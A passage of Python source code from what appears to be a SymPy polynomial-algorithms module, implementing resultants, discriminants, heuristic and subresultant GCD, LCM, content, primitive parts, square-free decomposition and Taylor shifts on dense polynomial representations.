r = dmp_ground_trunc(r, p, v, K)
D = dup_mul(D, [K.one, -a], K)
D = dup_trunc(D, p, K)
return r
def _collins_crt(r, R, P, p, K):
"""Wrapper of CRT for Collins's resultant algorithm. """
return gf_int(gf_crt([r, R], [P, p], K), P*p)
@cythonized("u,v,n,m")
def dmp_zz_collins_resultant(f, g, u, K):
"""Collins's modular resultant algorithm in `Z[X]`. """
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < 0 or m < 0:
return dmp_zero(u-1)
A = dmp_max_norm(f, u, K)
B = dmp_max_norm(g, u, K)
a = dmp_ground_LC(f, u, K)
b = dmp_ground_LC(g, u, K)
v = u - 1
B = K(2)*K.factorial(n+m)*A**m*B**n
r, p, P = dmp_zero(v), K.one, K.one
while P <= B:
p = K(nextprime(p))
while not (a % p) or not (b % p):
p = K(nextprime(p))
F = dmp_ground_trunc(f, p, u, K)
G = dmp_ground_trunc(g, p, u, K)
try:
R = dmp_zz_modular_resultant(F, G, p, u, K)
except HomomorphismFailed:
continue
if K.is_one(P):
r = R
else:
r = dmp_apply_pairs(r, R, _collins_crt, (P, p, K), v, K)
P *= p
return r
@cythonized("u,n,m")
def dmp_qq_collins_resultant(f, g, u, K0):
"""Collins's modular resultant algorithm in `Q[X]`. """
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < 0 or m < 0:
return dmp_zero(u-1)
K1 = K0.get_ring()
cf, f = dmp_ground_to_ring(f, u, K0, K1)
cg, g = dmp_ground_to_ring(g, u, K0, K1)
f = dmp_convert(f, u, K0, K1)
g = dmp_convert(g, u, K0, K1)
r = dmp_zz_collins_resultant(f, g, u, K1)
r = dmp_convert(r, u-1, K1, K0)
c = K0.convert(cf**m * cg**n, K1)
return dmp_exquo_ground(r, c, u-1, K0)
USE_COLLINS_RESULTANT = 0
@cythonized("u")
def dmp_resultant(f, g, u, K):
"""Computes resultant of two polynomials in `K[X]`. """
if not u:
return dup_resultant(f, g, K)
if K.has_Field:
if USE_COLLINS_RESULTANT and K.is_QQ:
return dmp_qq_collins_resultant(f, g, u, K)
else:
if USE_COLLINS_RESULTANT and K.is_ZZ:
return dmp_zz_collins_resultant(f, g, u, K)
return dmp_prs_resultant(f, g, u, K)[0]
@cythonized("d,s")
def dup_discriminant(f, K):
"""Computes discriminant of a polynomial in `K[x]`. """
d = dup_degree(f)
if d <= 0:
return K.zero
else:
s = (-1)**((d*(d-1)) // 2)
c = dup_LC(f, K)
r = dup_resultant(f, dup_diff(f, 1, K), K)
return K.quo(r, c*K(s))
@cythonized("u,v,d,s")
def dmp_discriminant(f, u, K):
"""Computes discriminant of a polynomial in `K[X]`. """
if not u:
return dup_discriminant(f, K)
d, v = dmp_degree(f, u), u-1
if d <= 0:
return dmp_zero(v)
else:
s = (-1)**((d*(d-1)) // 2)
c = dmp_LC(f, K)
r = dmp_resultant(f, dmp_diff(f, 1, u, K), u, K)
c = dmp_mul_ground(c, K(s), v, K)
return dmp_quo(r, c, v, K)
def _dup_rr_trivial_gcd(f, g, K):
"""Handle trivial cases in GCD algorithm over a ring. """
if not (f or g):
return [], [], []
elif not f:
if K.is_nonnegative(dup_LC(g, K)):
return g, [], [K.one]
else:
return dup_neg(g, K), [], [-K.one]
elif not g:
if K.is_nonnegative(dup_LC(f, K)):
return f, [K.one], []
else:
return dup_neg(f, K), [-K.one], []
return None
def _dup_ff_trivial_gcd(f, g, K):
"""Handle trivial cases in GCD algorithm over a field. """
if not (f or g):
return [], [], []
elif not f:
return dup_monic(g, K), [], [dup_LC(g, K)]
elif not g:
return dup_monic(f, K), [dup_LC(f, K)], []
else:
return None
USE_DMP_SIMPLIFY_GCD = 1
@cythonized("u")
def _dmp_rr_trivial_gcd(f, g, u, K):
"""Handle trivial cases in GCD algorithm over a ring. """
zero_f = dmp_zero_p(f, u)
zero_g = dmp_zero_p(g, u)
if zero_f and zero_g:
return tuple(dmp_zeros(3, u, K))
elif zero_f:
if K.is_nonnegative(dmp_ground_LC(g, u, K)):
return g, dmp_zero(u), dmp_one(u, K)
else:
return dmp_neg(g, u, K), dmp_zero(u), dmp_ground(-K.one, u)
elif zero_g:
if K.is_nonnegative(dmp_ground_LC(f, u, K)):
return f, dmp_one(u, K), dmp_zero(u)
else:
return dmp_neg(f, u, K), dmp_ground(-K.one, u), dmp_zero(u)
elif USE_DMP_SIMPLIFY_GCD:
return _dmp_simplify_gcd(f, g, u, K)
else:
return None
@cythonized("u")
def _dmp_ff_trivial_gcd(f, g, u, K):
"""Handle trivial cases in GCD algorithm over a field. """
zero_f = dmp_zero_p(f, u)
zero_g = dmp_zero_p(g, u)
if zero_f and zero_g:
return tuple(dmp_zeros(3, u, K))
elif zero_f:
return (dmp_ground_monic(g, u, K),
dmp_zero(u),
dmp_ground(dmp_ground_LC(g, u, K), u))
elif zero_g:
return (dmp_ground_monic(f, u, K),
dmp_ground(dmp_ground_LC(f, u, K), u),
dmp_zero(u))
elif USE_DMP_SIMPLIFY_GCD:
return _dmp_simplify_gcd(f, g, u, K)
else:
return None
@cythonized("u,v,df,dg")
def _dmp_simplify_gcd(f, g, u, K):
"""Try to eliminate `x_0` from GCD computation in `K[X]`. """
df = dmp_degree(f, u)
dg = dmp_degree(g, u)
if df > 0 and dg > 0:
return None
if not (df or dg):
F = dmp_LC(f, K)
G = dmp_LC(g, K)
else:
if not df:
F = dmp_LC(f, K)
G = dmp_content(g, u, K)
else:
F = dmp_content(f, u, K)
G = dmp_LC(g, K)
v = u - 1
h = dmp_gcd(F, G, v, K)
cff = [ dmp_exquo(cf, h, v, K) for cf in f ]
cfg = [ dmp_exquo(cg, h, v, K) for cg in g ]
return [h], cff, cfg
def dup_rr_prs_gcd(f, g, K):
"""Computes polynomial GCD using subresultants over a ring. """
result = _dup_rr_trivial_gcd(f, g, K)
if result is not None:
return result
fc, F = dup_primitive(f, K)
gc, G = dup_primitive(g, K)
c = K.gcd(fc, gc)
h = dup_subresultants(F, G, K)[-1]
_, h = dup_primitive(h, K)
if K.is_negative(dup_LC(h, K)):
c = -c
h = dup_mul_ground(h, c, K)
cff = dup_exquo(f, h, K)
cfg = dup_exquo(g, h, K)
return h, cff, cfg
def dup_ff_prs_gcd(f, g, K):
"""Computes polynomial GCD using subresultants over a field. """
result = _dup_ff_trivial_gcd(f, g, K)
if result is not None:
return result
h = dup_subresultants(f, g, K)[-1]
h = dup_monic(h, K)
cff = dup_exquo(f, h, K)
cfg = dup_exquo(g, h, K)
return h, cff, cfg
@cythonized("u")
def dmp_rr_prs_gcd(f, g, u, K):
"""Computes polynomial GCD using subresultants over a ring. """
if not u:
return dup_rr_prs_gcd(f, g, K)
result = _dmp_rr_trivial_gcd(f, g, u, K)
if result is not None:
return result
fc, F = dmp_primitive(f, u, K)
gc, G = dmp_primitive(g, u, K)
h = dmp_subresultants(F, G, u, K)[-1]
c, _, _ = dmp_rr_prs_gcd(fc, gc, u-1, K)
if K.is_negative(dmp_ground_LC(h, u, K)):
h = dmp_neg(h, u, K)
_, h = dmp_primitive(h, u, K)
h = dmp_mul_term(h, c, 0, u, K)
cff = dmp_exquo(f, h, u, K)
cfg = dmp_exquo(g, h, u, K)
return h, cff, cfg
@cythonized("u")
def dmp_ff_prs_gcd(f, g, u, K):
"""Computes polynomial GCD using subresultants over a field. """
if not u:
return dup_ff_prs_gcd(f, g, K)
result = _dmp_ff_trivial_gcd(f, g, u, K)
if result is not None:
return result
fc, f = dmp_primitive(f, u, K)
gc, g = dmp_primitive(g, u, K)
h = dmp_subresultants(f, g, u, K)[-1]
c, _, _ = dmp_ff_prs_gcd(fc, gc, u-1, K)
_, h = dmp_primitive(h, u, K)
h = dmp_mul_term(h, c, 0, u, K)
h = dmp_ground_monic(h, u, K)
cff = dmp_exquo(f, h, u, K)
cfg = dmp_exquo(g, h, u, K)
return h, cff, cfg
HEU_GCD_MAX = 6
def _dup_zz_gcd_interpolate(h, x, K):
"""Interpolate polynomial GCD from integer GCD. """
f = []
while h:
g = h % x
if g > x // 2:
g -= x
f.insert(0, g)
h = (h-g) // x
return f
@cythonized("i,df,dg")
def dup_zz_heu_gcd(f, g, K):
"""Heuristic polynomial GCD in `Z[x]`.
Given univariate polynomials `f` and `g` in `Z[x]`, returns their GCD
and cofactors, i.e. polynomials `h`, `cff` and `cfg` such that::
h = gcd(f, g), cff = quo(f, h) and cfg = quo(g, h)
The algorithm is purely heuristic which means it may fail to compute
the GCD. This will be signaled by raising an exception. In this case
you will need to switch to another GCD method.
The algorithm computes the polynomial GCD by evaluating polynomials
f and g at certain points and computing (fast) integer GCD of those
evaluations. The polynomial GCD is recovered from the integer image
by interpolation. The final step is to verify if the result is the
correct GCD. This gives cofactors as a side effect.
References
==========
.. [Liao95] <NAME>, <NAME>, Evaluation of the heuristic
polynomial GCD, International Symposium on Symbolic and Algebraic
Computation (ISSAC), ACM Press, Montreal, Quebec, Canada, 1995,
pp. 240--247
"""
result = _dup_rr_trivial_gcd(f, g, K)
if result is not None:
return result
df = dup_degree(f)
dg = dup_degree(g)
gcd, f, g = dup_extract(f, g, K)
if df == 0 or dg == 0:
return [gcd], f, g
f_norm = dup_max_norm(f, K)
g_norm = dup_max_norm(g, K)
B = 2*min(f_norm, g_norm) + 29
x = max(min(B, 99*K.sqrt(B)),
2*min(f_norm // abs(dup_LC(f, K)),
g_norm // abs(dup_LC(g, K))) + 2)
for i in xrange(0, HEU_GCD_MAX):
ff = dup_eval(f, x, K)
gg = dup_eval(g, x, K)
if ff and gg:
h = K.gcd(ff, gg)
cff = ff // h
cfg = gg // h
h = _dup_zz_gcd_interpolate(h, x, K)
h = dup_primitive(h, K)[1]
cff_, r = dup_div(f, h, K)
if not r:
cfg_, r = dup_div(g, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
return h, cff_, cfg_
cff = _dup_zz_gcd_interpolate(cff, x, K)
h, r = dup_div(f, cff, K)
if not r:
cfg_, r = dup_div(g, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
return h, cff, cfg_
cfg = _dup_zz_gcd_interpolate(cfg, x, K)
h, r = dup_div(g, cfg, K)
if not r:
cff_, r = dup_div(f, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
                    return h, cff_, cfg
x = 73794*x * K.sqrt(K.sqrt(x)) // 27011
raise HeuristicGCDFailed('no luck')
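# Illustrative sketch, not part of the original module: a typical call of the
# heuristic GCD above on dense coefficient lists (highest degree first). The
# `sympy.polys.domains` import path for the ZZ domain object is an assumption
# and may differ between versions.
#
#   from sympy.polys.domains import ZZ    # assumed location of the ZZ domain
#
#   f = [ZZ(1), ZZ(0), ZZ(-1)]            # x**2 - 1
#   g = [ZZ(1), ZZ(-1)]                   # x - 1
#   h, cff, cfg = dup_zz_heu_gcd(f, g, ZZ)
#   # h   == [1, -1]   (gcd = x - 1)
#   # cff == [1, 1]    (f // h = x + 1)
#   # cfg == [1]       (g // h = 1)
#
# If HeuristicGCDFailed is raised, callers are expected to fall back to the
# subresultant PRS GCD, as dup_inner_gcd() below does.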
@cythonized("v")
def _dmp_zz_gcd_interpolate(h, x, v, K):
"""Interpolate polynomial GCD from integer GCD. """
f = []
while not dmp_zero_p(h, v):
g = dmp_ground_trunc(h, x, v, K)
f.insert(0, g)
h = dmp_sub(h, g, v, K)
h = dmp_exquo_ground(h, x, v, K)
if K.is_negative(dmp_ground_LC(f, v+1, K)):
return dmp_neg(f, v+1, K)
else:
return f
@cythonized("u,v,i,dg,df")
def dmp_zz_heu_gcd(f, g, u, K):
"""Heuristic polynomial GCD in `Z[X]`.
       Given multivariate polynomials `f` and `g` in `Z[X]`, returns their GCD
and cofactors, i.e. polynomials `h`, `cff` and `cfg` such that::
h = gcd(f, g), cff = quo(f, h) and cfg = quo(g, h)
The algorithm is purely heuristic which means it may fail to compute
the GCD. This will be signaled by raising an exception. In this case
you will need to switch to another GCD method.
The algorithm computes the polynomial GCD by evaluating polynomials
f and g at certain points and computing (fast) integer GCD of those
evaluations. The polynomial GCD is recovered from the integer image
       by interpolation. The evaluation process reduces f and g variable by
variable into a large integer. The final step is to verify if the
interpolated polynomial is the correct GCD. This gives cofactors of
the input polynomials as a side effect.
References
==========
.. [Liao95] <NAME>, <NAME>, Evaluation of the heuristic
polynomial GCD, International Symposium on Symbolic and Algebraic
Computation (ISSAC), ACM Press, Montreal, Quebec, Canada, 1995,
pp. 240--247
"""
if not u:
return dup_zz_heu_gcd(f, g, K)
result = _dmp_rr_trivial_gcd(f, g, u, K)
if result is not None:
return result
df = dmp_degree(f, u)
dg = dmp_degree(g, u)
gcd, f, g = dmp_ground_extract(f, g, u, K)
f_norm = dmp_max_norm(f, u, K)
g_norm = dmp_max_norm(g, u, K)
B = 2*min(f_norm, g_norm) + 29
x = max(min(B, 99*K.sqrt(B)),
2*min(f_norm // abs(dmp_ground_LC(f, u, K)),
g_norm // abs(dmp_ground_LC(g, u, K))) + 2)
for i in xrange(0, HEU_GCD_MAX):
ff = dmp_eval(f, x, u, K)
gg = dmp_eval(g, x, u, K)
v = u - 1
if not (dmp_zero_p(ff, v) or dmp_zero_p(gg, v)):
h, cff, cfg = dmp_zz_heu_gcd(ff, gg, v, K)
h = _dmp_zz_gcd_interpolate(h, x, v, K)
h = dmp_ground_primitive(h, u, K)[1]
cff_, r = dmp_div(f, h, u, K)
if dmp_zero_p(r, u):
cfg_, r = dmp_div(g, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff_, cfg_
cff = _dmp_zz_gcd_interpolate(cff, x, v, K)
h, r = dmp_div(f, cff, u, K)
if dmp_zero_p(r, u):
cfg_, r = dmp_div(g, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff, cfg_
cfg = _dmp_zz_gcd_interpolate(cfg, x, v, K)
h, r = dmp_div(g, cfg, u, K)
if dmp_zero_p(r, u):
cff_, r = dmp_div(f, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff_, cfg
x = 73794*x * K.sqrt(K.sqrt(x)) // 27011
raise HeuristicGCDFailed('no luck')
def dup_qq_heu_gcd(f, g, K0):
"""Heuristic polynomial GCD in `Q[x]`. """
result = _dup_ff_trivial_gcd(f, g, K0)
if result is not None:
return result
K1 = K0.get_ring()
cf, f = dup_ground_to_ring(f, K0, K1)
cg, g = dup_ground_to_ring(g, K0, K1)
f = dup_convert(f, K0, K1)
g = dup_convert(g, K0, K1)
h, cff, cfg = dup_zz_heu_gcd(f, g, K1)
h = dup_convert(h, K1, K0)
c = dup_LC(h, K0)
h = dup_monic(h, K0)
cff = dup_convert(cff, K1, K0)
cfg = dup_convert(cfg, K1, K0)
cff = dup_mul_ground(cff, K0.quo(c, cf), K0)
cfg = dup_mul_ground(cfg, K0.quo(c, cg), K0)
return h, cff, cfg
@cythonized("u")
def dmp_qq_heu_gcd(f, g, u, K0):
"""Heuristic polynomial GCD in `Q[X]`. """
result = _dmp_ff_trivial_gcd(f, g, u, K0)
if result is not None:
return result
K1 = K0.get_ring()
cf, f = dmp_ground_to_ring(f, u, K0, K1)
cg, g = dmp_ground_to_ring(g, u, K0, K1)
f = dmp_convert(f, u, K0, K1)
g = dmp_convert(g, u, K0, K1)
h, cff, cfg = dmp_zz_heu_gcd(f, g, u, K1)
h = dmp_convert(h, u, K1, K0)
c = dmp_ground_LC(h, u, K0)
h = dmp_ground_monic(h, u, K0)
cff = dmp_convert(cff, u, K1, K0)
cfg = dmp_convert(cfg, u, K1, K0)
cff = dmp_mul_ground(cff, K0.quo(c, cf), u, K0)
cfg = dmp_mul_ground(cfg, K0.quo(c, cg), u, K0)
return h, cff, cfg
USE_DUP_HEU_GCD = 1
USE_DMP_HEU_GCD = 1
def dup_inner_gcd(f, g, K):
"""Computes polynomial GCD and cofactors of `f` and `g` in `K[x]`. """
if K.has_Field or not K.is_Exact:
if USE_DUP_HEU_GCD:
if K.is_QQ:
try:
return dup_qq_heu_gcd(f, g, K)
except HeuristicGCDFailed:
pass
return dup_ff_prs_gcd(f, g, K)
else:
if USE_DUP_HEU_GCD:
if K.is_ZZ:
try:
return dup_zz_heu_gcd(f, g, K)
except HeuristicGCDFailed:
pass
return dup_rr_prs_gcd(f, g, K)
@cythonized("u")
def _dmp_inner_gcd(f, g, u, K):
"""Helper function for `dmp_inner_gcd()`. """
if K.has_Field or not K.is_Exact:
if USE_DMP_HEU_GCD:
if K.is_QQ:
try:
return dmp_qq_heu_gcd(f, g, u, K)
except HeuristicGCDFailed:
pass
return dmp_ff_prs_gcd(f, g, u, K)
else:
if USE_DMP_HEU_GCD:
if K.is_ZZ:
try:
return dmp_zz_heu_gcd(f, g, u, K)
except HeuristicGCDFailed:
pass
return dmp_rr_prs_gcd(f, g, u, K)
@cythonized("u")
def dmp_inner_gcd(f, g, u, K):
"""Computes polynomial GCD and cofactors of `f` and `g` in `K[X]`. """
if not u:
return dup_inner_gcd(f, g, K)
J, (f, g) = dmp_multi_deflate((f, g), u, K)
h, cff, cfg = _dmp_inner_gcd(f, g, u, K)
return (dmp_inflate(h, J, u, K),
dmp_inflate(cff, J, u, K),
dmp_inflate(cfg, J, u, K))
def dup_gcd(f, g, K):
"""Computes polynomial GCD of `f` and `g` in `K[x]`. """
return dup_inner_gcd(f, g, K)[0]
@cythonized("u")
def dmp_gcd(f, g, u, K):
"""Computes polynomial GCD of `f` and `g` in `K[X]`. """
return dmp_inner_gcd(f, g, u, K)[0]
def dup_rr_lcm(f, g, K):
"""Computes polynomial LCM over a ring in `K[x]`. """
fc, f = dup_primitive(f, K)
gc, g = dup_primitive(g, K)
c = K.lcm(fc, gc)
h = dup_exquo(dup_mul(f, g, K),
dup_gcd(f, g, K), K)
return dup_mul_ground(h, c, K)
def dup_ff_lcm(f, g, K):
"""Computes polynomial LCM over a field in `K[x]`. """
h = dup_exquo(dup_mul(f, g, K),
dup_gcd(f, g, K), K)
return dup_monic(h, K)
def dup_lcm(f, g, K):
"""Computes polynomial LCM of `f` and `g` in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_lcm(f, g, K)
else:
return dup_rr_lcm(f, g, K)
@cythonized("u")
def dmp_rr_lcm(f, g, u, K):
"""Computes polynomial LCM over a ring in `K[X]`. """
fc, f = dmp_ground_primitive(f, u, K)
gc, g = dmp_ground_primitive(g, u, K)
c = K.lcm(fc, gc)
h = dmp_exquo(dmp_mul(f, g, u, K),
dmp_gcd(f, g, u, K), u, K)
return dmp_mul_ground(h, c, u, K)
@cythonized("u")
def dmp_ff_lcm(f, g, u, K):
"""Computes polynomial LCM over a field in `K[X]`. """
h = dmp_exquo(dmp_mul(f, g, u, K),
dmp_gcd(f, g, u, K), u, K)
return dmp_ground_monic(h, u, K)
@cythonized("u")
def dmp_lcm(f, g, u, K):
"""Computes polynomial LCM of `f` and `g` in `K[X]`. """
if not u:
return dup_lcm(f, g, K)
if K.has_Field or not K.is_Exact:
return dmp_ff_lcm(f, g, u, K)
else:
return dmp_rr_lcm(f, g, u, K)
def dup_trunc(f, p, K):
"""Reduce `K[x]` polynomial modulo a constant `p` in `K`. """
if K.is_ZZ:
g = []
for c in f:
c = c % p
if c > p // 2:
g.append(c - p)
else:
g.append(c)
else:
g = [ c % p for c in f ]
return dup_strip(g)
@cythonized("u")
def dmp_trunc(f, p, u, K):
"""Reduce `K[X]` polynomial modulo a polynomial `p` in `K[Y]`. """
return dmp_strip([ dmp_rem(c, p, u-1, K) for c in f ], u)
@cythonized("u,v")
def dmp_ground_trunc(f, p, u, K):
"""Reduce `K[X]` polynomial modulo a constant `p` in `K`. """
if not u:
return dup_trunc(f, p, K)
v = u-1
return dmp_strip([ dmp_ground_trunc(c, p, v, K) for c in f ], u)
def dup_monic(f, K):
"""Divides all coefficients by `LC(f)` in `K[x]`. """
if not f:
return f
lc = dup_LC(f, K)
if K.is_one(lc):
return f
else:
return dup_quo_ground(f, lc, K)
@cythonized("u")
def dmp_ground_monic(f, u, K):
"""Divides all coefficients by `LC(f)` in `K[X]`. """
if not u:
return dup_monic(f, K)
if dmp_zero_p(f, u):
return f
lc = dmp_ground_LC(f, u, K)
if K.is_one(lc):
return f
else:
return dmp_quo_ground(f, lc, u, K)
def dup_rr_content(f, K):
"""Returns GCD of coefficients over a ring. """
cont = K.zero
for c in f:
cont = K.gcd(cont, c)
if K.is_one(cont):
break
return cont
def dup_ff_content(f, K):
"""Returns GCD of coefficients over a field. """
if not f:
return K.zero
else:
return K.one
def dup_content(f, K):
"""Returns GCD of coefficients in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_content(f, K)
else:
return dup_rr_content(f, K)
@cythonized("u,v")
def dmp_content(f, u, K):
"""Returns GCD of multivariate coefficients. """
cont, v = dmp_LC(f, K), u-1
if dmp_zero_p(f, u):
return cont
for c in f[1:]:
cont = dmp_gcd(cont, c, v, K)
if dmp_one_p(cont, v, K):
break
if K.is_negative(dmp_ground_LC(cont, v, K)):
return dmp_neg(cont, v, K)
else:
return cont
@cythonized("u,v")
def dmp_rr_ground_content(f, u, K):
"""Returns GCD of coefficients over a ring. """
if not u:
return dup_rr_content(f, K)
cont, v = K.zero, u-1
for c in f:
gc = dmp_rr_ground_content(c, v, K)
cont = K.gcd(cont, gc)
if K.is_one(cont):
break
return cont
@cythonized("u")
def dmp_ff_ground_content(f, u, K):
"""Returns GCD of coefficients over a field. """
if not f:
return K.zero
else:
return K.one
@cythonized("u")
def dmp_ground_content(f, u, K):
"""Returns GCD of coefficients in `K[X]`. """
if not u:
return dup_content(f, K)
if K.has_Field or not K.is_Exact:
return dmp_ff_ground_content(f, u, K)
else:
return dmp_rr_ground_content(f, u, K)
def dup_rr_primitive(f, K):
"""Returns content and a primitive polynomial over a ring. """
cont = dup_content(f, K)
if not f or K.is_one(cont):
return cont, f
else:
return cont, dup_exquo_ground(f, cont, K)
def dup_ff_primitive(f, K):
"""Returns content and a primitive polynomial over a field. """
return K.one, f
def dup_primitive(f, K):
"""Returns content and a primitive polynomial in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_primitive(f, K)
else:
return dup_rr_primitive(f, K)
@cythonized("u,v")
def dmp_primitive(f, u, K):
"""Returns multivariate content and a primitive polynomial. """
cont, v = dmp_content(f, u, K), u-1
if dmp_zero_p(f, u) or dmp_one_p(cont, v, K):
return cont, f
else:
return cont, [ dmp_exquo(c, cont, v, K) for c in f ]
@cythonized("u")
def dmp_rr_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial over a ring. """
cont = dmp_ground_content(f, u, K)
if K.is_one(cont):
return cont, f
else:
return cont, dmp_exquo_ground(f, cont, u, K)
@cythonized("u")
def dmp_ff_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial over a ring. """
if dmp_zero_p(f, u):
return K.zero, f
else:
return K.one, f
@cythonized("u")
def dmp_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial in `K[x]`. """
if not u:
return dup_primitive(f, K)
if dmp_zero_p(f, u):
return K.zero, f
if K.has_Field or not K.is_Exact:
return dmp_ff_ground_primitive(f, u, K)
else:
return dmp_rr_ground_primitive(f, u, K)
def dup_sqf_p(f, K):
"""Returns `True` if `f` is a square-free polynomial in `K[x]`. """
if not f:
return True
else:
return not dup_degree(dup_gcd(f, dup_diff(f, 1, K), K))
@cythonized("u")
def dmp_sqf_p(f, u, K):
"""Returns `True` if `f` is a square-free polynomial in `K[X]`. """
if dmp_zero_p(f, u):
return True
else:
return not dmp_degree(dmp_gcd(f, dmp_diff(f, 1, u, K), u, K), u)
@cythonized("s")
def dup_sqf_norm(f, K):
"""Square-free norm of `f` in `K[x]`, useful over algebraic domains. """
if not K.is_Algebraic:
raise DomainError("ground domain must be algebraic")
s, g = 0, dmp_raise(K.mod.rep, 1, 0, K.dom)
while True:
h, _ = dmp_inject(f, 0, K, front=True)
r = dmp_resultant(g, h, 1, K.dom)
if dup_sqf_p(r, K.dom):
break
else:
f, s = dup_taylor(f, -K.unit, K), s+1
return s, f, r
@cythonized("s,u")
def dmp_sqf_norm(f, u, K):
"""Square-free norm of `f` in `K[X]`, useful over algebraic domains. """
if not u:
return dup_sqf_norm(f, K)
if not K.is_Algebraic:
raise DomainError("ground domain must be algebraic")
g = dmp_raise(K.mod.rep, u+1, 0, K.dom)
F = dmp_raise([K.one,-K.unit], u, 0, K)
s = 0
while True:
h, _ = dmp_inject(f, u, K, front=True)
r = dmp_resultant(g, h, u+1, K.dom)
if dmp_sqf_p(r, u, K.dom):
break
else:
f, s = dmp_compose(f, F, u, K), s+1
return s, f, r
def dup_sqf_part(f, K):
"""Returns square-free part of a polynomial in `K[x]`. """
if not f:
return f
if K.is_negative(dup_LC(f, K)):
f = dup_neg(f, K)
gcd = dup_gcd(f, dup_diff(f, 1, K), K)
sqf = dup_exquo(f, gcd, K)
if K.has_Field or not K.is_Exact:
return dup_monic(sqf, K)
else:
return dup_primitive(sqf, K)[1]
@cythonized("u")
def dmp_sqf_part(f, u, K):
"""Returns square-free part of a polynomial in `K[X]`. """
if dmp_zero_p(f, u):
return f
if K.is_negative(dmp_ground_LC(f, u, K)):
f = dmp_neg(f, u, K)
gcd = dmp_gcd(f, dmp_diff(f, 1, u, K), u, K)
sqf = dmp_exquo(f, gcd, u, K)
if K.has_Field or not K.is_Exact:
return dmp_ground_monic(sqf, u, K)
else:
return dmp_ground_primitive(sqf, u, K)[1]
@cythonized("i")
def dup_sqf_list(f, K, **args):
"""Returns square-free decomposition of a polynomial in `K[x]`. """
if K.has_Field or not K.is_Exact:
coeff = dup_LC(f, K)
f = dup_monic(f, K)
else:
coeff, f = dup_primitive(f, K)
if K.is_negative(dup_LC(f, K)):
f = dup_neg(f, K)
coeff = -coeff
if dup_degree(f) <= 0:
if args.get('include', False):
return f
else:
return coeff, []
result, i = [], 1
h = dup_diff(f, 1, K)
g, p, q = dup_inner_gcd(f, h, K)
all = args.get('all', False)
while True:
d = dup_diff(p, 1, K)
h = dup_sub(q, d, K)
if not h:
result.append((p, i))
break
g, p, q = dup_inner_gcd(p, h, K)
if all or dup_degree(g) > 0:
result.append((g, i))
i += 1
if not args.get('include', False):
return coeff, result
else:
(g, i), rest = result[0], result[1:]
g = dup_mul_ground(g, coeff, K)
return [(g, i)] + rest
@cythonized("u,i")
def dmp_sqf_list(f, u, K, **args):
"""Returns square-free decomposition of a polynomial in `K[X]`. """
if not u:
return dup_sqf_list(f, K, **args)
if K.has_Field or not K.is_Exact:
coeff = dmp_ground_LC(f, u, K)
f = dmp_ground_monic(f, u, K)
else:
coeff, f = dmp_ground_primitive(f, u, K)
if K.is_negative(dmp_ground_LC(f, u, K)):
f = dmp_neg(f, u, K)
coeff = -coeff
if dmp_degree(f, u) <= 0:
if args.get('include', False):
return f
else:
return coeff, []
result, i = [], 1
h = dmp_diff(f, 1, u, K)
g, p, q = dmp_inner_gcd(f, h, u, K)
all = args.get('all', False)
while True:
d = dmp_diff(p, 1, u, K)
h = dmp_sub(q, d, u, K)
if dmp_zero_p(h, u):
result.append((p, i))
break
g, p, q = dmp_inner_gcd(p, h, u, K)
if all or dmp_degree(g, u) > 0:
result.append((g, i))
i += 1
if not args.get('include', False):
return coeff, result
else:
(g, i), rest = result[0], result[1:]
        g = dmp_mul_ground(g, coeff, u, K)
return [(g, i)] + rest
def dup_extract(f, g, K):
"""Extracts common content from a pair of polynomials in `K[x]`. """
fc = dup_content(f, K)
gc = dup_content(g, K)
gcd = K.gcd(fc, gc)
if not K.is_one(gcd):
f = dup_exquo_ground(f, gcd, K)
g = dup_exquo_ground(g, gcd, K)
return gcd, f, g
@cythonized("u")
def dmp_ground_extract(f, g, u, K):
"""Extracts common content from a pair of polynomials in `K[X]`. """
fc = dmp_ground_content(f, u, K)
gc = dmp_ground_content(g, u, K)
gcd = K.gcd(fc, gc)
if not K.is_one(gcd):
f = dmp_exquo_ground(f, gcd, u, K)
g = dmp_exquo_ground(g, gcd, u, K)
return gcd, f, g
def dup_mirror(f, K):
"""Evaluate efficiently composition `f(-x)` in `K[x]`. """
f, n, a = list(f), dup_degree(f), -K.one
for i in xrange(n-1, -1, -1):
f[i], a = a*f[i], -a
return f
def dup_scale(f, a, K):
"""Evaluate efficiently composition `f(a*x)` in `K[x]`. """
f, n, b = list(f), dup_degree(f), a
for i in xrange(n-1, -1, -1):
f[i], b = b*f[i], b*a
return f
def dup_taylor(f, a, K):
"""Evaluate efficiently Taylor shift `f(x + a)` in `K[x]`. """
f, n = list(f), dup_degree(f)
for i in xrange(n, 0, -1):
for j in xrange(0, i):
f[j+1] += a*f[j]
return f
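# Illustrative sketch, not part of the original module: the Taylor shift above
# rewrites the coefficient list of f(x) into that of f(x + a). The ZZ import
# path is an assumption and may differ between versions.
#
#   from sympy.polys.domains import ZZ    # assumed location of the ZZ domain
#
#   f = [ZZ(1), ZZ(0), ZZ(0)]             # x**2
#   dup_taylor(f, ZZ(1), ZZ)              # [1, 2, 1], i.e. (x + 1)**2
#
# dup_mirror() and dup_scale() above work the same way for f(-x) and f(a*x),
# adjusting coefficients directly instead of expanding symbolically.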
def dup_transform(f, p, q, K):
"""Evaluate functional transformation `q**n * f(p/q)` in `K[x]`. """
if not f:
return []
h, Q = [f[0]], [[K.one]]
for i in xrange(0, dup_degree(f)):
Q.append(dup_mul(Q[-1], q, K))
for c, q in zip(f[1:], Q[1:]):
h = dup_mul(h, p, K)
q = dup_mul_ground(q, c, K)
h = dup_add(h, q, K)
return h
def dup_compose(f, g, K):
"""Evaluate functional composition `f(g)` in `K[x]`. """
if len(g) <= 1:
return dup_strip([dup_eval(f, dup_LC(g, K), K)])
if not f:
return []
h = [f[0]]
for c in f[1:]:
h = dup_mul(h, g, K)
h = dup_add_term(h, c, 0, K)
